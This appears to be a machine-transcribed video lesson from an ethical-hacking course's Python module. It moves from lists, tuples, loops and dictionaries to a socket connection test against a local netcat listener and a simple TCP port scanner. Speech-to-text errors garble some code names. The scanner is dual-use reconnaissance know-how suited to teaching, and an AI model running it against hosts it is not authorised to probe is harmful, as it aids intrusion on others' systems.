a developer program or even writing these scripts is all the scenarios that could happen in these situations you got to think of the logic behind it so when you're building out a script you're building out your first program you need to think logically if i make an if statement or a conditional statement what's the logic behind it so a lot of times for example in this scenario we might have thought okay well if i don't have the age or the money okay but you got to think about what if i do have the age but not the money or i do have the money but not the age so you have to think through everything in your head and make sure that it's all clicking and this just takes repetition and just sitting down the best way is sitting down with a pen and paper and not writing this in code form but just writing this in a sense that makes sense to you thinking through it logically and then writing it out in code so from here we're going to go ahead and move on to list in the next video so once you're all caught up here let's go ahead and move right over there okay now let's talk about lists so lists are data structures now these data structures are changeable we can reorder them put them in a list right so they're just a group of elements and when you when you have this list everything inside that list is called an item and the best way to think of a list is to think that it lives in between brackets you're going to see other things later on that look like a list but it's not really a list because of how it's defined and how we're going to define lists is because they live in brackets just like a string might have quotes around it a list is going to have these brackets around it so let's make a new line and let's go ahead and just do something along the lines of lists and we could just say something like have brackets like this okay so let's go ahead and make a list and then we can kind of go from there so let's define a list of your favorite movies now you can put in whatever favorite movies you like in here and i'm going to put in something like when harry met sally the hangover the perks of being a wall flower this is getting kind of long so i'm actually going to move this over a little bit for us and we'll say one more let's pick four movies we'll do the exorcist okay and now we have this this list again lists just live in brackets so we've got list item one item two item three and item four okay so let's go ahead and print these so if we were to print out something like movies and we said we wanted to print the first item out of movies let's go ahead and try to print when harry bet sally so we'll print the first item so put a bracket around it just like this we'll print it out and we'll see what happens so let's save it and what's it gonna return for us it's returning the hangover so item one is not item one as you see it so when we talk about items when we talk about numerical order here in python item one is actually going to be referred to as zero so make a note here for yourself that this will return the second item so if we wanted to return just when harry met sally we would actually put in movies zero like this and we could say returns the first item in the list okay and we can save that and let's go ahead and give it a go just to do proof of concept and there you go so remember that everything starts with zero and not one so when you're thinking about things let's think about them with zero as the beginning number so let's go ahead and do a few more different prints what's going to happen when we print out something like this we'll say movies and we'll do one through three do you have a hunch let's go ahead and save it print it out here and it will take the list here of starting at one and it'll end before three so let's say we want to pull a couple items out the first number that we're going to pull out is going to be the one that we want to start with and the last number that we're going to pull out is going to be the number where we're going to stop so the exorcist is 3 but if we wanted to actually pull down the exorcist we would have to pull down 4 here so if we want to try to grab more than one thing on the list we can absolutely do that but we have to know where to stop so now we incorporate the exorcist here let's say we wanted to grab everything in a list and we wanted to grab everything after a certain point right we could say something like movies one like this and then we should be able to grab every single thing and that does pretty much the same thing here so if we had 30 items here it would grab all 30 items in this list if we wanted to grab three items as we did before we would do one then you would just add three to that to four and it would stop so a little bit confusing this takes a little bit to wrap your mind around but the good thing here is that you take notes you can make notes however you feel comfortable with and these tricks should be useful for you so let's try another thing what if we said something like movies and we did this one in reverse we just did something like this and we did save let's print it out what do you think is going to happen it's going to print when harry met sally because it's going to stop at the 1. we never get to 1 here again similar situation when we have this set to 3 we never get to one we stop at one so we're going to grab everything before one which is going to be just b when harry met sally we could set this to 2 and we would grab the hangover in this as well and just to prove concept here so that i'm not crazy you can see here the hangover gets added in because we get 0 and we grab 1. you could also think of this if you don't confuse yourself as grabbing two items out of the list but make sure you don't confuse yourself because if this number were to be like two through four then it would be something completely different right so you need to make sure that you understand where from the list that you're actually grabbing i'm just going to control z these back there you go so from here let's do two more tricks actually we'll do one more trick and then we'll move into some other items related to lists so if we say movies like this and we want to grab the very last item we can just put in a negative one and this will grab the absolute last item off the list that way like if you have a list that's 2 000 items long and you don't know where it ends you could just do negative one and it's going to grab the last item for you and then you can see there it grabs down the exorcist so cool little tricks you might not use these for a while and you probably won't see these come through at least in anything we're going to really do in the course but they're still incredibly useful to know about because they're they are included in the basics of python so if you're going to know the basics of python and you will use these sometime in your lifetime it's useful to know this kind of stuff so we can also do some things with lists as well we can print out the length of our list so we could say length of movies something like this and give that a go and you can see that there's four items in that list so we've seen length before with strings and it took every single character inside that string here it's taking every single amount of item inside a list and it's printing that out we could also append items to the list so we could say something like movies dot a pen and what if we really like jaws and we added that into our favorite movies you can't have too many favorite movies come on so let's go ahead and try printing that out and well we have to actually print it sorry movies that append and then we say print movies now and it should print out with jaws added in where do we think jaws is going to actually add itself into well if you said the end of the list you are correct so when we append something we append it to the very end of the list what if we wanted to delete something from the list we could say something like this movies.pop and print movies let's see what happens here and now we got rid of draws so when we append we append to the end of the list if we want to delete the very last item in the list we just use pop now if we wanted to delete something like the first item or the second item we could do movies.pop and let's say zero we print movies this will remove the very very first item in the list we should see when harry met sally disappear and there you go no longer is when harry met sally in our list so this is a quick way that we can remove these items and on the fly if we need to to get rid of this so the high level overview here and the thing that you really need to take away is that lists have brackets we're going to see something called dictionaries later we might see something called tuples later and they all look very very similar but here lists have brackets inside those brackets are what we have that are called items okay and there are many different ways to return items the reason that i'm showing you these different ways is so that you can get familiar with the syntax that we start our list or our items with zero and not one and that we can grab from these lists in different ways okay and this will come back into play later with how we can utilize the same kind of syntax with other items as well or other things in python so we can also utilize you know printing out length or we can do a dot append and add to the list or dot pop and there's a lot of different things we can do here to you know to append to these lists or remove from these lists etc so this is just the basics but hopefully what you take away from this is that lists have brackets and you know the items there are items in a list and they start with zero those are the key takeaways so in the next video we're going to briefly talk about tuples and then we're going to move on into looping so let's go ahead and do that okay let's briefly talk about tuples now tuples are like lists but they're not like lists so lists are what we call mutable meaning that they can be changed now tuples tuples are immutable they cannot be changed now for this course this is the last time you're going to be seeing tuples but it's important to define what they are so that you know them you know how to identify them and they're just in the back your mind as hey i know what a tuple is and that thing is immutable i can't change it once i have it so let's take a look at a tuple okay let's make a new line here and start a comment we get to say tuples do not change and also we can put parentheses like this because remember lists had brackets tuples have parentheses so we're going to say something like grades now we're going to have an item that won't change so we're going to define grades here as just a b c d and f which is common for the us grading system and this is an example of a tuple so again we have parentheses instead of brackets now if we were to go in here and we were to try to do a grades dot pop for example and try to remove one of these not going to be possible or a grades dot append we're not going to put something else in here this is immutable we cannot change this once we have it defined so we can go ahead and print out our grades and we could say print out grades let's print out a b and that will work and you can see now we printed a b so we have similar features or abilities that we did here but we cannot change it in any way so once we have this defined and set that's it for us so this is it i just wanted to quickly show you what a tuple is again we're not going to get into it at all in this course but it should be defined and we should know the difference between a list which is mutable versus a tuple which is immutable so in the next video we're going to get into looping so we've already covered looping in the bash scripting section of the course but we're going to go ahead and get into the python version of looping as well and make some more sense of it so i will catch you over in the next video now moving on to looping so we introduced looping in our bash scripting video and we took the four loops and we made one line for loops and those should be familiar to you so for loop is just a start to finish of an iterate right we wanted to run that ping scanner for example and we started at the 1 and we ended at 256 on our ip sweep now we're going to introduce that in python form and we're also going to introduce a while loop now the while loop is going to come back into play later on in this course especially when we get into the exploit development part of the course so a while loop just think of it that it executes as long as something is true so let's make a new section here we're going to do a new line as usual and we're just going to go ahead just say something like looping and let's go ahead and start with four loops so we'll do four loops and let's note that this is just the start to finish of and iterate okay so let's say for example that we have a list okay let's go back to list and we'll say vegetables and let's just throw some vegetables in there you can pick whatever you want i'm gonna do cucumber i'm gonna do spinach and how about cabbage okay and again your list can look however you want it to look now for this for loop we're going to say for x and remember same thing with bash x can be whatever you want to call it you can call this for veggies you can call whatever you want i just like to use a letter because it's simple to type out we're going to say for x in vegetables we're just going to print x and what do we think this is going to do this is going to go through this list right and so say for every item in vegetables i want you to print that out so we're going to grab cucumber we're going to grab spinach we're going to grab cabbage it's going to print print print so let's take a look at that let's go ahead and save it we'll run our script here you can see that it printed cucumber spinach and cabbage so again you've seen this before just a classic example of a for loop as long as we have something to iterate through we're iterating through a list here and remember before again we were like sequence one through two fifty five we iterated through that to do our ping sweep so we're just iterating through something that's it really basic now we also have while loops so we'll say while loops and these execute as long as true so later on you're going to see something that says while true will be capital while true we're going to do something don't worry about that right now for this example what we're going to do is we're going to say i equals one okay and so we set a variable i that's equal to 1. now let's do a while loop we're going to say well i is less than 10 i want you to go ahead and print out i and then we're going to iterate i plus equals 1. so this should all start tying together from what you saw earlier remember that we have the plus equals and we're adding 1 to something so what we're doing here is we're saying hey i equals 1 and you know what while i is less than 10 i want you to go ahead and print out i then we're going to say hey i is plus or equal to 1 so that means i is now going to be 2. then we're going to go back through this loop again now while 2 is less than 10 go ahead and print out that it's 2 make it 3. 3 is less than 10 over and over and over and over until this condition is no longer true the second that this i becomes 10 this loop is now no longer true and it's going to stop so we're going to go ahead and save this here let's go ahead and print this out and you can see that we just printed one through nine as expected so you're gonna get to see these again you're gonna get examples of them again as of right now i just want you to understand that a for loop is an iterate and a while loop executes as long as true okay so don't worry about how they're used quite yet just understand what they are what they mean and then you're going to see them come up in practical examples later on it'll make a lot more sense as we go through it so we're gonna move on to the next video i'm gonna go ahead and catch you over there okay we are moving into i don't want to call it advanced python i just want to say more advanced than where we were before if previously we were in a 101 class we're moving kind of into some 102 material i wouldn't even call it 201 material this is just more advanced beginner stuff how about that so what we're going to do is we're going to go ahead and start a new script that way we can kind of have our new 102 section here and kind of improve upon what we've been doing a little bit so what i want you to do is i just want you to g edit and we'll just call this new script dot pi put a little ampersand at the end as usual and we're just going to declare our bin bin python3 here if i can type it out bin python3 and we're going to go ahead and talk about our first concept which is going to be importing so importing is important when we say importing modules are existent in python right and we have a lot of them built in but there are these modules that are not built in but available to us for example a module called sis now sys does a lot of important things sys has to deal with anything related to system functions and parameters one system function in parameter that we can do is something like printing out the version of python that we're running so we could say print sys.version okay now if we go to do that and we say save and we just go ahead and say python3 newsscript.hi you can see the name of cis is not defined so we're getting an error here well that's because we haven't imported it so we can do is we can say import sys and up here we can go ahead and just give this a nice comment next to it and we can just say that sis is a system a function and parameters okay and then let's go ahead and save this and now let's go and run it again now you can see that we are running python 3.7.5 rc1 and we have now successfully printed this out why did this work this worked because sys does not by default come imported some items already built in by default sys is not one of them but cis is very important and we're going to use it over and over again so you're going to see it a lot one of the most frequent if not the most frequent along with os is another one import os you're going to see a lot of that over and over so why are we going to see this well we have things like arg v so rv is arguments so when you think about from the bash lesson like dollar sign one you know when we had an argument and we were doing our ping like our script dot sh and we had our ip address here as dollar sign one something along those lines well those are the same thing we just call it rv in python that's something another thing is if we want to say sys.exit which you're going to see again later in this course we do assist.exit that exits python cleanly we need assist.exit so you're going to see cis quite repeatedly on top of this there's more things that we can do with modules let's go ahead and delete this and let's say that we wanted to import another module called datetime now this does exactly what you think it does but what if we wanted to import a specific part of date time we didn't want to import the whole thing we just want to import one module we can say from date time import date time so we can do the same thing with cis we can import a specific part assist or we can import all of cis so with datetime we're importing a specific part of it right and we can do something like print date time dot now something like that and it should print us the date time so do this you can see now today's date is 11 16 2019 and what time we're recording so we can also do another nifty feature when it comes to importing we can import with aliases so instead of from date time import date time we can say import date time as something like dt you could say import with alias and instead of having to write datetime.now over and over and over something like that we can just write dt is shorter we know what it means and we don't have to write out date time which is kind of lengthy so print it again you can see it still works so importing is important i'm going to say it again you need to know that we're going to be importing certain modules out of python most of these are built in there are occasional times you're going to have to go out and download something and put it in your library and import it that way but for the this course that we're doing you're only going to be importing from things that are pre-existing with python so not everything is automatically ready to go sometimes you have to import things in order to improve upon your script or do it make it do what you want to do so we're going to build off of this when we start writing our scripts and you're going to see this repeatedly you're going to also see this again when we do our exploit development part of the course so let's go ahead and move on we're going to move on to some advanced strings and we're going to get close to wrapping up here and start building out some cool little python scripts so i'll see you over in the next video okay let's talk about advanced strings so everything i'm going to show you is not going to be used in this course but i still think it's important to know and there's some important syntax in here to know as well and just different ways to handle the information that is in front of you so let's go ahead and just print out a string or let's make a string first let's do a string of my name and we'll just say my name is heath and similar to before if we printed out our name we could say print my name and then if i wanted to print the first initial of my name or first letter in my name i would just do something like this right so this should be familiar and if we wanted to print out the last letter we could just say negative one this should be familiar to you from the list lesson so we go ahead and we print this we just say python3 and we do our new script again you can see that we have big h and a little h because my name ends in both starts and ends in bold so we could also do something like take a sentence and we could say sentence this is a sentence and if we wanted to print out the first word of the sentence we would have to know the amount of letters in it so we know here that there is one two three four so this would be zero through three so let's say if we wanted to print out sentence here and we knew zero through three so remember we don't have to put zero we could just put something like this and then if we did through three it would only cut off at the i remember we have to go one further from our list lesson and we'll be able to print out the word this we can do the same with sentence we could go forward a bunch if we want to or we could do a negative nine because this is nine characters long through something like a negative 9 through negative 1 would pull out that whole sentence or the word sentence i should say so we can manipulate data this way we can also split data so we could say something like print and do sentence dot split and this will split based on a delimiter now the delimiter here is by default a space and we covered delimiters in bash scripting and we're just going to say hey every time there's a space i want you to split out the sentence let's take a look at what that looks like i made a mistake in my script i didn't spell sentence correctly which caused an error in the initial script so let's try that again so you see here it says this that's what we're expecting from this one and here we have this is a sentence it now breaks these out into individual words based on a delimiter so let's go a little bit further we can join a sentence as well so let's have a scenario here let's say we want to split a sentence out we'll say sentence split is equal to sentence dot split and now we just split out the sentence right and we're putting in this variable of sentence underscore split now we could also join a sentence so let's make a new variable and we'll call it sentence join and here we can just say based on a delimiter i want you to put a space in between everything here so every every time you see a word in this sentence split so let's go ahead and join anytime you see sentence split here and there's a new word in it i want you to go ahead and join those with a space and then we can go ahead and print out sentence join and let's see what happens here this is a sentence so i brought it all back for us so not only can we take away and delimit a sentence by splitting we can also join a sentence and add our own delimiter in there as well so one of the most important things that we need to talk about is what happens if we have a quote and we say something like he said give me all your money well we need to add quotations in here but if we do quotations like this well that's just making things really weird right look at the color of the script you can already tell it's going weird that's going to throw an error but we can use single quotes and double quotes and it'll work we could also use single quotes here double quotes inside double quotes on the outside single quotes on the inside and that's a way to have quotes inside of a string so let's go ahead and print that out but let's say that you were insistent and you wanted to have double quotes and then double quotes here well we could do a little bit of character escaping so we could utilize this backslash here and say hey we're going to keep this string a string and then i'm going to end it right here so this will tell me that from here to here ignore these characters right so we're going to treat it as a string don't treat it as a quotation and end of string so let's run it again and you can see that quote once we print it we could say print quote and we'll actually run it here he said give me all your money and i realized that i tried to print earlier and probably did not print this quote because i never had the print in there so i'm sorry for that but we could do it either way again we can put the single quotation in here and you'll see the single quote works but if we were to put in a double quotation it would break it so i'm going to control z a couple times and this is what the syntax should look like this is very very important if there's one thing you're going to take away from advanced strings please please take this away from it because you need to know how to do some character escaping and that you will encounter that again in your career so a couple more things let's say that we want to have a string here let's say we'll call the string too much space and we have something like hello and we just you know copied data put it into this and somehow too much space in here we can strip out the space so we can just print too much space here and we can do the same thing as we did before and do something like strip like this save it and look what happens now it's just going to print hello there's no space around it we're good to go so that's a nice little feature another feature that we should know is let's say we had something like print a in apple what's this going to return true what it's looking for is does a exists an apple well what if we did a lower case here try it again and you're going to see that it's false so it's very case sensitive well what about we wanted to say hey is there an a in the word apple and we don't know if it's capitalized not capitalized well we might say something instead like hey we're looking for a letter of a and we're looking for the word of apple right but what about we say print letter dot lower and then we say in word dot lower like this now this becomes improved because we're looking for a specific letter inside of specific word and when we lower case everything we lowercase this letter lowercase all these letters then we're looking for a specific letter in a word we don't have to worry about case sensitivity and you will see this logic come into play when you're thinking about looking for specific items or specific key phrases or matching anything specifics you might want to consider putting everything in a lower case and then trying to find it that way unless you are critical on case sensitivity so this will probably come up again in your career as you look at code so if we run that again now you can see that it returns back true so one more thing i'm going to show you and there's a lot of things that we can do with advanced strings i don't want to beat too much into it because i really feel that this can get into overkill because there's so many things and tips and tricks that i can show you but i really feel like some of this can be out of scope for the course but i do think that as long as you're taking good notes and it's valuable now you're gonna have that as something to remember and look back upon as you do more python development so one more thing is a format so let's say that your favorite movie is the hangover and we'll just keep that as a string and let's just say something like print my favorite movie now we have done in the past is and we could just say something like this plus you know a string if it's not a string or we just say movie right and then we'd have to add a period in here something along those lines we can improve upon this we could say my favorite movie is and then we can just add a little placeholder here and then put a period now what we do after this is we just say dot format and then we say movie and now it knows to put in the movie that we have here or the variable that we have stored in movie it knows to put it into these brackets here we save this and watch what happens my favorite movie is the hangover so you don't have to do a bunch of spacing and if things get weird you know with with your your string or you know how to write out your sentence it's very easy to just have these placeholders and then if things change you know it just updates easily so this is a very nice way to hold things in a placeholder without making these weird formatting changes so i i like this method as opposed to the concatenation method that i showed you in our first video on strings so if you're going to take away some things today just take away that you know we have different ways of doing things we've shown you with the list before the zero and the negative one i told you it was going to come up again just know that again zero is the first item or first letter or first whatever when we're talking about python and we're talking about our variables lists strings always start with a zero there's different ways to do the same thing and apply them across other items right so i've shown you this with lists i've shown you this with strings so get those wheels spinning and think about how you can utilize some things now sentence has all different kinds of methods that we can use with it and again we're just touching back on methods and making it a little bit more advanced but you see that we can split a sentence we can join a sentence we can strip a sentence or we can strip a string so understanding that there are a lot of cool methods uh the lower method we could do an upper method we've talked about those as well knowing the different types of methods per say like a string or per class or however you want to combine it together is important as well so always do your research when you are looking into you know how can i improve it so if you're saying like hey is there a way to make something uppercase just go to google and say hey how do i make a string all uppercase and of course it's dot upper but if you didn't know that then you know the google machine would know that for you and a lot of your code is going to be found on stack exchange or on google et cetera so just be aware that these things exist and be aware that there are better ways to format your strings and there are important syntax when it comes to escaping your quotations as well so that's it for this lesson we're going to have a couple more little lessons here and then we're going to move into script building and then we'll be starting our hacking journey so i'll catch you over in the next video alright we are in the home stretch everybody so we're going to cover dictionaries now and when we think of dictionaries we need to think of key value pairs so let's go ahead and make a new section called dictionaries and we'll just note key value pairs probably put a slash here key value pairs and we'll also put a little note of curly braces like this so let's talk dictionaries so let's say we have a dictionary and we want to have a menu let's make a drink menu again make this however you want i'm going to make this based on some alcoholic beverages you can absolutely make this more you know pg or pg-13 or however you want to make it but let's say a white russian we go to a bar there's a white russian on the menu and that white russian costs seven dollars and there's also an old fashion and we just say that's ten bucks and then we have a lemon drop which is eight dollars so we've got these and we'll close off this with a curly bracket and this is what a dictionary looks like so if you were to print out drinks we would return our dictionary let's do that if i would make this the correct syntax this would work very well for me i am human after all so you see here white russian 7 old fashioned 10 lemon drop 8. so what you can note here is that the drink is your key and your price is your is your value so you have your key value pair here so key value key value key value well think of it as another way we don't have to just have one parameter or one value we have to have a key we can have multiple values to a key so let's talk about employees and i'm going to use one of my favorite tv show which is bob's burgers to do this so let's say we have employees and we have different departments so let's say we have a finance department okay and inside the finance department we've got bob we've got linda and we've got tina so we got three employees in the finance department then we've got an it department and inside of it there might be gene and louise we'll add teddy to this too why not i'm gonna have to move this over because it's a little bit long and then let's do one more department let's say there's a department of hr our favorite department and we'll say there's jimmy jr and mort all right so this is our dictionary now again we can print out employees and we should be able to see our dictionary here save this give it a print okay you can see finance has bob linda tina i t has jean louise and td and jimmy jr and more are in hr i'm gonna fix this typo and all right so let's say that we want to add a new key value pair well we can say let's say there's a new department and we could say there's a new department called legal so employees and let's add in legal and then we'll say in legal there is mr frond all right and this will add a new key value pair something like this all right so we'll save this go ahead and just print it and if i were to write print afterwards print employees and we'll save it let's print it one more time now you see that legal has been added with mr frond working in legal okay let's do another let's say that we've added somebody to the sales team and let's do it this way we didn't have a sales team before but we do now so we can also do an update something like this we could say update and then we can add in sales and we can say hey we've got a nice new sales team of andy and ollie and it'll look something like this so now we print out employees we should have andy and ollie on the sales team as well so there's multiple ways to add in new key value pairs so we can copy this and paste it over here as a key value as well so we can also update things this is last thing i'm going to show you we can also update things so we could say let's go back to our drinks let's say that we've got the white russian let's say the white russian is no longer seven dollars our menu has changed and it's now eight dollars so we're gonna make eight dollars then we'll just print out drinks and we can save that print it and now you can see the white russian is now eight dollars instead of seven from before we can also get some items out of a dictionary so we say print drinks dot get and we'll just get the white russian and let's see what that returns so you can pull specifically from a dictionary here and you see that the white russian has a value of 8. so this is it for dictionaries you're not going to really see it come up in this course but again this is another valuable thing with python to know so we have covered lists which have brackets like this we've covered tuples which have parentheses and then now we have covered dictionaries which have the curly braces and now when you're reading code you should be able to identify all them differently this is why this was important everything has been building upon up until this point right so now you should identify okay i see those curly braces you know that's going to be a dictionary or i see these these brackets here that's going to be a list so keep that in mind and moving forward you should be able to now start reading this code and understanding this code and from the beginning i told you we don't have to be developers but we do have to be able to read code so the more i show you the better off that you're going to be so we're going to wrap up this lesson we've got a couple more before we start building our scripts and we'll be uh be good to go and move into hacking so i will catch you over in the next lesson welcome to your final module before we start working on scripts so this last module is a very important one because we have to define what sockets are so we're going to be using sockets to connect two nodes together really that's it and more layman's terms we're doing is we're going to use sockets to connect to an open port and ip address so you're going to see this when we build a port scanner you're also going to see this later on in the exploit development portion of the course where we have to reach out to a specific port and ip address establish a connection and send malicious data so what we're going to do here is we're going to just build out a simple socket script and we're going to connect to an open port with that script and it'll start to make sense and then when you see it in the next video when we build out the port scanner make a little bit more sense and you see it again in the course you're gonna say hey i remember that we use sockets for connecting two ports so here's what we're gonna do we're going to make a file and call the file s.pi you can call it whatever you want just do not call it socket.pi if you call it socket.pi you're going to run into issues because it's going to think it is a socket so we need to define a couple of things first so we're going to do is we're going to of course shebang up top do our bin python3 and we're going to import socket so remember importing is important we have to import socket up here at the top now let's define a couple of variables so the first variable we're going to say is host and we're just going to give that our local address here of one two seven zero zero one this is our localhost and we're going to define port and i'm just going to give mine all sevens you can give it whatever you'd like here and i'm going to define another variable like this s equals socket dot socket socket dot af inet socket dot sock underscore stream now this looks long and intimidating please do not be intimidated by this we are just making our life easier on ourselves so we're defining a variable that stores all this into one and this is very very common when it comes to sockets your the syntax here is very common so we're saying is hey we want s2 equal socket dot socket and this socket af inet socket sock stream so afi net just think about that as ipv4 we're connecting over an ipv4 connection socket.sockstream you could just think of this as a port so afi net ipv4 sockstream it's a port so let's say we want to make a connection we're going to say s dot connect now connect is just another part of the socket module so we're going to make a connection here and so if you think about this we're using all this and then dot connect right so we're declaring this and then we have these two parameters here socket afi net socket stock stream so the afi net we need to say hey let's make this a our host variable and then this one our port variable and we could in theory just put in seven seven seven seven and one two seven zero zero one but it's just easier to find those in a variable up top and then use them later to connect so i'm gonna go ahead and save this and then i'm going to open up a new terminal in a new window here and i'm going to utilize a tool that we have not used before and this tool is called netcat and we'll use this later on in the course quite a bit so we'll say netcat and i'm just going to say ndlp this means i'm going to establish a listening port i'm going to listen on port 7777 for connection so you see here it says hey we're listening on any interface for all sevens you have to worry too much about this right now we're gonna go into detail on netcat at a later time but all we're doing right now is we're waiting for anybody to connect to us now here we're sitting at our local host of one two seven zero zero one so we need to establish that connection which is what we're going to do with this script now the script does nothing it establishes a connection and that is it so let's go ahead and take a quick look we're just going to say python3 s dot pi do that come over here and you see that we had an established connection made and then the connection closed we didn't tell it to do anything there's nothing here to say hey keep this connection open send over some data do anything at all we just said hey make a connection really quick and it did it made a connection from one two seven zero zero one to one two seven zero zero one we connected to ourselves but with this script we have successfully achieved what we wanted to which was to utilize sockets to connect one node to another node that's it so we're going to build upon this whole thing here in the next lesson we're going to build a port scanner it's going to be a bad port scanner but it's still going to be a great lesson so let's go ahead and just take a look at that port scanner and i'll catch you in the next video all right welcome to the last video in our python module so now we're going to be making a port scanner and you heard me saying last video that it's going to be a terrible port scanner and it is but it's going to be a functional port scanner as well and we'll talk about what we can do to improve it and how we can think this through so what we're going to do is we're going to go ahead and open up a g edit here so i'm going to say g edit and we'll just go ahead and call this scanner dot pi and we'll do the ampersand at the end and let's go ahead and declare that this is going to be python3 and now let's talk through some things so there's going to be a lot of familiarity everything i've done up until this point has been for a reason and you're going to start to see it all tied together so the end goal of this project is going to be that we run something along the lines of python3 scanner.pi and we provide an ip address here now with that ip address it's going to go ahead and scan through a selected port range for us and try to return back results whether or not the port is open so we're just checking if a port is open on a machine so to do that we're going to need a few things so first of all we're going to need to import sys we're going to import socket as we are going to make a node to node connection and we're going to import date time from date time as we're going to make a pretty little banner as well so why was cis important i told you sis would come back into play so we have here an argument so there are actually two arguments in theory argument zero is that we're running scanner.pi argument one is that we are running against an ip address now since we're building this script out we want it to take two arguments and only two arguments so we're going to build that into our script from the get go so let's go ahead and just define our target and it's always good when you're building out a script to have good notes in there as well so not only that you can go back and read it but if you send this to somebody else they could also read through it as well so put good comments in here good notes saying what you're doing so in this instance we're going to put an if statement again conditional argument here we're going to say if the length of cis.rgv remember this is the same thing as like a dollar sign one in bash we're going to take that we're going to say if it's equal to 2 we're going to go ahead and do something and what we're going to do is we're going to declare a variable of target and we're going to say socket get host by name and then we're going to get cisargv1 so we're taking the first argument again this is same thing as dollar sign one like this in bash why are we doing this well we're just translating a hostname here to ipv4 now this is not inherently necessary we could just declare the target by input it could just be target equals sys.rgb1 but we're just taking an extra step here in case instead of somebody putting in an ip address they could just put in like a hostname say we have a host here and it's you know like one of mine is called the punisher you know what if they put in punisher well if that punisher name does dns and it resolves to an ip address it's going to go ahead and do that with this argument here so we're just putting in an extra step thinking ahead we also need an else to this so if it doesn't equal two if it's three if it's one if it's none then we're going to go ahead and just print out and say invalid amount of arguments and then we can actually take this here and we can put this into a print statement as well let's print just say something like syntax python 3 scanner ip address something along those lines okay so i always like to save it and then just run it and make sure everything works fine so let's go ahead and give it python3 we'll say scanner.pi and we'll give it no argument and it's going to say okay invalid amount arguments syntax is python3 scanner.pi ip so we'll just give it an argument here okay so it runs didn't get the we met the conditions and we set the target variable to well to this right so that's okay for now so let's go ahead and i like to always put in a pretty little banner or something you know so let's add a pretty banner and i'm just gonna do something like this i'm going to say print and we're going to do dashes we'll do 50 dashes and then we'll go ahead i'm going to copy this just a little bit easier and let's go ahead and print a couple things we'll say print we'll say scanning target and then we'll add a space and let's do plus target and then we'll say print time started and then we can just do a space there plus the string of date time dot now now that came back into play as well so make sure you have three closing parenthesis so we've now utilized sys socket and date time all of which we have seen in the past and then that last copy paste here for the banner so let's go ahead and save this and give it another go and you can see it says okay scanning target and it's resolving to this 23 this is this is not accurate but you know just let it do its thing um and then it's got the time started of the scan here so you can see here i'm putting in a hostname and it's trying to resolve to dns to this uh maybe this is how what it resolves to i don't know but we'll move on so the next thing we're going to do is what is called a try statement so we're going to try to do something and if we can't do it we have exceptions so you'll see what this looks like when it's all built out so go ahead and type try and you're going to see try later as well when we get into the exploit development so we're gonna do a four statement so four port in range now we need to specify the range if we were going to do a full on port scanner we would do for port 1 through 65 535 okay that will take forever we'll talk about why i told you this was a bad port scanner we'll talk about why we're not going to do this in a little bit so let's go ahead and delete these and we're just going to put something like 50 to 85 and i'll clarify why we're doing that in just a second so on top of this let's add in some familiar language we're going to say s equals socket dot socket and then socket dot af underscore inec comma socket dot sock stream remember afi net is ipv4 sock stream is our port so we're going to say socket dot set default timeout to 1. why are we doing this this is going to attempt to connect to a port if that port is not connectable it's going to wait one second and then it's going to move on that way we're not sitting there forever trying to make a connection to a port we set the timeout ourselves so we're also going to store a result so the result is going to be s dot connect underscore ex and it's going to be target comma port so why are we doing this well when we do this connect underscore ex right it returns an error indicator so i'm gonna put returns an error indicator if a port is open the result back is going to be zero if a port is not open it's going to throw an error which is going to trigger a one so let's think that through if result is equal to zero then we're going to go ahead and just print out that this port is open we'll throw this in here this time for a placeholder instead we'll say is open and we'll do format port and then one more thing i'll close it out and we'll walk through this one more time so that it all makes sense okay so then we're closing the connection okay so we've got this try statement let's walk through it one more time we've got a for loop here remember four is just an iterate we're going through an iterate we're going through 450 in so we're defining a port right in this range so 50 51 52 all the way up to 85. we're going to repeat this whole process we're going to establish our variable s which we did in the socket video the previous video right we're just declaring hey i know i'm going to want to connect to ipv4 and a port when i do make that connection i want that default timeout to be one second okay so then i'm going to store inside of a variable of a result i'm going to say let's connect to the target which we've already established as cisarg v1 and the port which is our iterate here in our loop and if that port is open it's going to return 0. if it's not open it's going to return 1. so if that result is zero go ahead and print out that that port is open close the connection and then we're going to go back and try to establish another connection with por er with yeah port number 51 52 53 we'll loop through all this until we make it all the way through 85 okay so it's just one big loop that we're doing now we need to throw in a few exceptions to make this code really work so here's an exception exception keyboard interrupt so if you've been using linux for a little bit now you should know something like control c is a keyboard interrupt so if we want to interrupt the scan we need to define that there is an interruption here so i'm just going to put in something like exiting program okay and we're going to say when that happens when there is a keyboard interrupt we're going to say sys exit that allows for that clean exit okay there's another exception that could be occurred here right so we're going to say socket.gai air and we're going to say print hostname could not be resolved so if we can't resolve the hostname dns is failing us we're just going to go ahead and exit out and then one more what if we can't make the connection to the address in general well that's what's called a socket error so we're going to say socket.air and we're going to print out couldn't get if i could type it couldn't connect to server and then we're also going to exit this so we'll say sys.exit so i'll give you a little bit of time to catch up on this script if you're behind i was typing fast and talking as well so one more walk through we're going to do our for loop through these specific ports and then we're going to go ahead and have some exceptions so we're going to try these with exceptions here if we hit control c we want to exit the program if there's no hostname resolution we want to exit the program if we can't connect to the ip address that we specify we want to exit the program so we need to build in these exits and these are that this is that thinking logically that i talked about uh earlier in earlier videos right that we it wouldn't hurt to build this out and then just think logically and i will be the first person to tell you that when i build a script out and i write it it's always terrible first times always terrible tenth time still probably pretty terrible you have to start thinking of things logically like you might not define an if statement at the beginning right you might have to think through that because you might need one argument or two arguments or three arguments and you don't know so maybe this doesn't look like this and it doesn't look like the pretty banner in here either and you just start with this for loop and then you realize well maybe i should make that a try statement because what if the user wants to exit or there's no connection for a host name or there's no connection to the server how do we get out of that or else we're just going to be stuck in this for loop until it's done but if we get into one of these air situations it's gonna get weird right so and then you start thinking through okay well i know my argument so let me go add in a statement at the top so the user knows how to use it and then maybe i'll put a pretty banner in there when it's all said and done and it starts to really you know design itself now before we run this let's talk about why this isn't great this is going to sit here and run through one port at a time for a second of a timeout and then reiterate this is going to take a little bit to run through these little ports now when we get into scanning you're going to see that there are tools out there designed that do it much better much more efficiently and much faster this is not the best way there is something that we could do called threading now threading would take the process and run multiple processes at once for us and allow us to scan a lot of ports at once that would be a potential idea here and there's just improvements that we can do you know some of the things that we thought about already like the the socket get host by hostname you might not have thought about that in your first iteration you might just say hey i want to just put it to ipv4 and what happens if you know we supply an argument and the argument is something like a mixed bunch of numbers now it could be like one five two and then you got letters and somebody mistyped or or what if you give you know an ip address that doesn't exist something like this or you know maybe like 256 dot or 257 or something you know that that isn't possible how is that built in how are we going to prevent that in our script right now not that big of a deal we're writing this for ourselves so you know it's not it doesn't have to be perfect but if we write this for somebody else we go put this on github we kind of want all those 